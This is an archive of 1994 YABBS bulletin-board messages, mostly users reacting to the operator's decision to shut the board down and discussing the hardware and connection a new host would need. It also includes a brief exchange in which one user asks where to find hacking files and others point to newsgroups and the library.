is that it does... alex From JackY@yabbs Mon Aug 22 10:50:43 1994 From: JackY@yabbs To: all@yabbs Subject: yabbs Date: Mon Aug 22 10:50:43 1994 Hey, after reading some previous messages here, I get the impression that htoaster is considering shutting down yabbs. I recommend 2 courses of action: No. 1: We all tell him how much we love yabbs so that peer pressure forces him to keep it up, at least long enuff for No. 2: Someone else to download the yabbs software and set up another similar bbs. From cosmos@yabbs Mon Aug 22 12:35:30 1994 From: cosmos@yabbs To: JackY@yabbs Subject: re: yabbs Date: Mon Aug 22 12:35:30 1994 Answer to #1: Peer pressure or no peer pressure, it is his show. I for one know that if it was my show and I had the headaches he has to deal with due to it, that I would have brought the bastard down long time ago or made it a private system. Personally, I could give a rats ass what everyone else thought, my system, my time, my money then you dont factor in to the decision. Then again, I am a bit more callous than Alex... Answer to #2 Its a small minority that have their own REAL 24/7 direct connect to the internet. You need a fairly large machine to handle the load and the know how and patience to run it. It's not gonna happen kids. Cosmos From Justbob@yabbs Mon Aug 22 12:36:25 1994 From: Justbob@yabbs To: htoaster@yabbs Subject: re: read 'em and weep Date: Mon Aug 22 12:36:25 1994 ---- well, if anyone else wants to run yabbs and has a free internet connection they are free to...i really just don't have the time for it shouldn't take a lot of time, but the truth is that it does... ---- I would love to, but somehow, i don't imagine that the highschool would take kindly to the types of discussions taking place on yabbs ;) [Altho, sometime...hopefully during the first semester...I will be putting up a bbs, subdued & sucky as it may be] From Justbob@yabbs Mon Aug 22 12:40:11 1994 From: Justbob@yabbs To: htoaster@yabbs Subject: re: yabbs Date: Mon Aug 22 12:40:11 1994 Hrmmm...last message seems to have gotten hosed as cosmos was entering at the ame time [is the message file flocked/lockfed when someone is entering?] --- well, if anyone else wants to run yabbs and has a free internet connection they are free to...i really just don't have the time for it shouldn't take a lot of time, but the truth is that it does... --- I would love to, but i don't think the highschool would take kindly to the types of discussions taking place on yabbs :/ [however, i will, hopefully withinh the first semester, be setting up a bbs, limited & controlled tho it may be] From balistic@yabbs Mon Aug 22 13:35:25 1994 From: balistic@yabbs To: htoaster@yabbs Subject: re: yabbs Date: Mon Aug 22 13:35:25 1994 Alex, I realize that you can do whatever you want with this system, but please don't shut it down. When I first logged on here I figured this was going to be another lame, poorly-constructed, semi-illiterate IRC-type place. But after I explored YABBS this was obviosly not the case. I feel YABBS is hands-down THE best bbs I have ever used. Most of the ppl I know and correspond with are on YABBS. I don't want to sound like I'm kissing butt here, but it's true, please don't take YABBS away so suddenly..... balistic the depressed From JackY@yabbs Mon Aug 22 15:53:43 1994 From: JackY@yabbs To: cosmos@yabbs Subject: Date: Mon Aug 22 15:53:43 1994 cosmos, Actually, I agree with most of what you said. (especially the part about being more callous than Alex) ;-) But don't be such a pessimest! Shit, I would have a shot at running the goddamn thing if I could, and I have only the foggiest idea how. There's gotta be some yabber out there with direct access and a machine that can do this. From what I've heard, yabbs is run on a 486. Thats not exactly a prohibitive hardware requirement. JackY From cosmos@yabbs Mon Aug 22 16:51:42 1994 From: cosmos@yabbs To: JackY@yabbs Subject: re: Date: Mon Aug 22 16:51:42 1994 Lets get real, kid. Pessimistic as I may be, you don't seem to understand what it takes in time and cost to run something like this. First, you need a direct connection to the internet 24/7. SLIP/PPP aint gonna cut it. Second, you need to spend a good deal of manhours in maintaining it...I dont care what you say or think, this is true. Third, yes it is run on a 486. The machine also has about 20 megs ram, and could use some more at peak points. The average ram size in a 486 is 4 megs. A good deal have 8, its still not terribly cheap these days. Bottom line...its going to take quite a while to find someone that meets ALL of the above MINIMUM requirements and that will do it. I sure as hell wouldnt...or at most would make it a closed system. Cosmos From htoaster@yabbs Mon Aug 22 17:33:38 1994 From: htoaster@yabbs To: JackY@yabbs Subject: re: yabbs Date: Mon Aug 22 17:33:38 1994 In message yabbs, JackY said: > Hey, after reading some previous messages here, I get the impression > that htoaster is considering shutting down yabbs. I recommend 2 > courses of action: this is true... > No. 1: We all tell him how much we love yabbs so that peer pressure > forces him to keep it up, at least long enuff for this won't work, i just don't have the time or interest to keep it up just isn't fun for me anymore (and hasn't been for a while)... > No. 2: Someone else to download the yabbs software and set up another > similar bbs. they can have the data files, etc, for this one if they want... alex From htoaster@yabbs Mon Aug 22 17:36:15 1994 From: htoaster@yabbs To: cosmos@yabbs Subject: re: Date: Mon Aug 22 17:36:15 1994 okay, heres the deal on yabbs hardware... it should be run on a 486sx/25 or better...16 megs of ram is pretty much the least you would want (it would run in 8, just swap quite a bit more)... maybe 250 megs disk or so minimum... the hard part is a high speed link to the high speed i mean t-1 speeds or better...56k, isdn, slip/ppp, or whatever you have run to your house just won't cut all of the interactive think to the lag is bad now? :) alex From Natalie@yabbs Mon Aug 22 22:29:29 1994 From: Natalie@yabbs To: htoaster@yabbs Subject: re: yabbs Date: Mon Aug 22 22:29:29 1994 i understand where you're coming from, alex. if i was doing something that wasn't fun anymore and i had the option to stop doing it, i would too. and this gives me a good reason to stop sitting at the computer for way too long getting absolutely nothing accomplished. now i can get back to my book. it's been fun... natalie From taegu@yabbs Mon Aug 22 22:57:05 1994 From: taegu@yabbs To: htoaster@yabbs Subject: re: yabbs Date: Mon Aug 22 22:57:05 1994 Alex, I just wanted to say thank-you for giving me the oppertunity to meet all the wonderful people that I have met on yabbs. I have made many friends that i would have otherwise had never known. Thank you for all the time and effort you have put into this bbs. I will surely miss it when its gone, but, I understand why you have the need to quit supporting it. Thanks again! Kevin From Justbob@yabbs Tue Aug 23 00:25:03 1994 From: Justbob@yabbs To: htoaster@yabbs Subject: re: yabbs Date: Tue Aug 23 00:25:03 1994 Hrmm....'t appears i have posted away from everyone else's that case, see Yabbs Bugs s From Famine@yabbs Tue Aug 23 06:32:54 1994 From: Famine@yabbs To: htoaster@yabbs Subject: Yabbs RIP Date: Tue Aug 23 06:32:54 1994 Well the end of yabbs is near, all I have to say is thanks htoaster, although I haven't been using yabbs that long it was good whilst it lasted. I am sorry that you felt you had to close it down, but am grateful that you started it and have spend so much time and effort in its running. Famine. From Jazzy@yabbs Tue Aug 23 09:12:40 1994 From: Jazzy@yabbs To: all@yabbs Subject: read /i roth Date: Tue Aug 23 09:12:40 1994 From Justbob@yabbs Wed Aug 24 12:39:40 1994 From: Justbob@yabbs To: Jazzy@yabbs Subject: re: read /i roth Date: Wed Aug 24 12:39:40 1994 Woah...deja vu...I coulda sworn i just saw the same thing in Bugs... From Typhon@yabbs Thu Aug 25 12:01:41 1994 From: Typhon@yabbs To: htoaster@yabbs Subject: Lateration Date: Thu Aug 25 12:01:41 1994 I haven't really been here all that long, have I? It feels like forever. I really enjoyed YABBS (There were god damned WEEKS this summer where this was all I got up for) and I'll miss it. You gave me a chance to get some stuff out of my sould and explore sides of myself I never get to see, and to ACTUALLY INETRACT WITH PEOPLE! Thanks, man. I'm sorry it hasn't been fun for was a blast for me. Matthew Rossi ps: Now that I think about it, between you and me we kept that whole meat/vegitarian thing rolling almost all summer, didn't we? And tehreason I didn't send this email is because everybody should know how cool you've been. From icebox@yabbs Thu Aug 25 20:10:02 1994 From: icebox@yabbs To: Natalie@yabbs Subject: re: yabbs Date: Thu Aug 25 20:10:02 1994 Don't be so certai. I haven't read previous messages, but your board has given me the ability to express a lot (comin' from up here, you know). I will be willing to prove that something can be accomplish if tested. I've met the first task with excellent remarks. Check the boards. That's progress. God Bless the United States of America(s)! Your buddy, icebox ---- > Numero Uno, no Dos! From johndeer@yabbs Sat Aug 27 11:07:09 1994 From: johndeer@yabbs To: cosmos@yabbs Subject: re: yabbs Date: Sat Aug 27 11:07:09 1994 well I've got a (max) 10mbps connection, 20mb ram, a bit of HD space, but i'm running OS/2 and I don't even have TCP/IP native drivers for OS/2.. hmm.. i kinda doubt porting yabbs to OS/2 will be an easy feat... john Deere From Optimus@yabbs Sun Aug 28 22:55:57 1994 From: Optimus@yabbs To: all@yabbs Subject: FILES!!! Date: Sun Aug 28 22:55:57 1994 Could someone tell me where I can get some reading material and programs for an ibm compatible about hacking, phreaking, anarchy, ect... (via telnet, ftp, ANTHING!!) From brael@yabbs Mon Aug 29 03:23:03 1994 From: brael@yabbs To: Optimus@yabbs Subject: re: FILES!!! Date: Mon Aug 29 03:23:03 1994 go read alt.2600 -brael. From balistic@yabbs Mon Aug 29 12:58:54 1994 From: balistic@yabbs To: htoaster@yabbs Subject: this is not a complaint Date: Mon Aug 29 12:58:54 1994 Would having us yabbernauts pay to use this system make it worthwhile to run? I'd certainly be willing to pay a modest sum to get access. I realize it would still take a lot of time for you to run but at least you'd get some compensation...... From balistic@yabbs Mon Aug 29 13:03:50 1994 From: balistic@yabbs To: all@yabbs Subject: death Date: Mon Aug 29 13:03:50 1994 Just like to say that everybody here at YABBS has made the 4 months I had using it great. Is there life after YABBS? :) looks like we'll be stuck with IRC for ahwhile huh :) later, balistic the newbie :) (this ASCII may not come thru right but...) 88888888888888 8888800000000000 8888 888800000QQQQQQQQQ000088888 88880000 QQQQQQQQQQQQQQQ0000088888 8888880000 QQQQQQQQQQQQ0000QQ 000008 88888000000 QQQQQQ QQ00000QQ 0000 8880000 QQQQQ Q0000QQ 00 88888800000 QQQQQ QQ00QQQ 0 88888000000 QQQQQQQ QQQQQQQQQ 0 888880000000 QQQQQQQQQQQQQQQQQQQQ QQ 0000 QQQQQQQQQQQQQQQQQQ QQQQ 00000 QQQQQQQQQQQQQQQQ 00000000QQQ 00000000000000000000000000 "HERE'S LOOKIN AT YOU, KID" :) From balistic@yabbs Mon Aug 29 13:09:01 1994 From: balistic@yabbs To: balistic@yabbs Subject: re: this is not a complaint Date: Mon Aug 29 13:09:01 1994 disregard that message...forgot to delete it :) From balistic@yabbs Mon Aug 29 13:10:07 1994 From: balistic@yabbs To: balistic@yabbs Subject: re: this is not a complaint Date: Mon Aug 29 13:10:07 1994 not the last one but the one about a pay system :) From Justbob@yabbs Mon Aug 29 14:04:29 1994 From: Justbob@yabbs To: Optimus@yabbs Subject: re: FILES!! Date: Mon Aug 29 14:04:29 1994 Read security newsgroups for starters. You could read alt.2600, but you wouldn't_learn_ the stuff. You'd have it memorized, but you wouldn't know _how_ it works From htoaster@yabbs Mon Aug 29 14:56:12 1994 From: htoaster@yabbs To: balistic@yabbs Subject: re: this is not a complaint Date: Mon Aug 29 14:56:12 1994 In message this is not a complaint, balistic said: > Would having us yabbernauts pay to use this system make it worthwhile > to run? I'd certainly be willing to pay a modest sum to get access. I > realize it would still take a lot of time for you to run but at least > you'd get some compensation...... not really. i'm not interested in money at this point in my life (never really am to tell you the truth)...I really would like to see the system run somewhere, just not here...I'd even like to be able to use some of my free time to make the software better, but I can't do that when I spend my free time worrying about other stuff... alex From pnovak@yabbs Mon Aug 29 17:52:50 1994 From: pnovak@yabbs To: all@yabbs Subject: re: this is not a complaint Date: Mon Aug 29 17:52:50 1994 Ht's been clearspoken. It's not a maer of sums, it's a matter of annoyance. pno sugests solutions, which he can unfortunately notprovide due to ignorance. Maybe others... ... From pnovak@yabbs Mon Aug 29 17:56:10 1994 From: pnovak@yabbs To: all@yabbs Subject: re: this is not a complaint Date: Mon Aug 29 17:56:10 1994 excuse typos... From iggy@yabbs Mon Aug 29 23:18:18 1994 From: iggy@yabbs To: Optimus@yabbs Subject: re: FILES!!! Date: Mon Aug 29 23:18:18 1994 If you are really, really, REALLY serious about hacking, then start with your local library. Consume everything on computers. If you want to just piss around then try Brinta, isca ftp at There's some interesting stuff there. From iggy@yabbs Mon Aug 29 23:22:50 1994 From: iggy@yabbs To: htoaster@yabbs Subject: ciao Date: Mon Aug 29 23:22:50 1994 Oh, like this is the board for it *shrug* oh well. It may be necessary, but I still don't this board disappearing. I'm not whining, it's meant as an expression of thanx. I've only been on here for a couple of weeks and was finally beginning to feel at home (almost) and now it's going. Shit happens I guess. If there are other BBS's out there that has the character of this one, I'd sure like to know their addresses. ciao From Optimus@yabbs Mon Aug 29 23:43:30 1994 From: Optimus@yabbs To: iggy@yabbs Subject: re: FILES!!! Date: Mon Aug 29 23:43:30 1994 Thanks for the information!! Is their anymore out their?? From Death@yabbs Tue Aug 30 03:46:14 1994 From: Death@yabbs To: all@yabbs Subject: Yabbs! Date: Tue Aug 30 03:46:14 1994 Ummm... Yabbs is almost definitely staying up... read post 1505 in Social Misfits for the info (I don't want to type it again :) But Yabbs WILL LIVE!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! --Les (Who is feeling very optimistic on this lovely tuesday morning :) From balistic@yabbs Tue Aug 30 17:04:43 1994 From: balistic@yabbs To: htoaster@yabbs Subject: re: this is not a complaint Date: Tue Aug 30 17:04:43 1994 I understand.....although it's kind of hard for me to contemplait not wanting money (I'm a teenager don't ya know :)) Till the next incarnation of yabbs, Brian From balistic@yabbs Tue Aug 30 17:06:33 1994 From: balistic@yabbs To: Death@yabbs Subject: re: Yabbs! Date: Tue Aug 30 17:06:33 1994 Hey death...gimme the telnet address and I'm there :) balistic From Death@yabbs Wed Aug 31 00:54:06 1994 From: Death@yabbs To: balistic@yabbs Subject: re: Yabbs! Date: Wed Aug 31 00:54:06 1994 As soon as I know what it'll be, I'll tell htoaster so he can post it on phred (and if I know before Yabbs goes down, I'll post it here myself :) It'll most likely be I'll fill in the something soon... --Les (Who is going to KILL his freind...)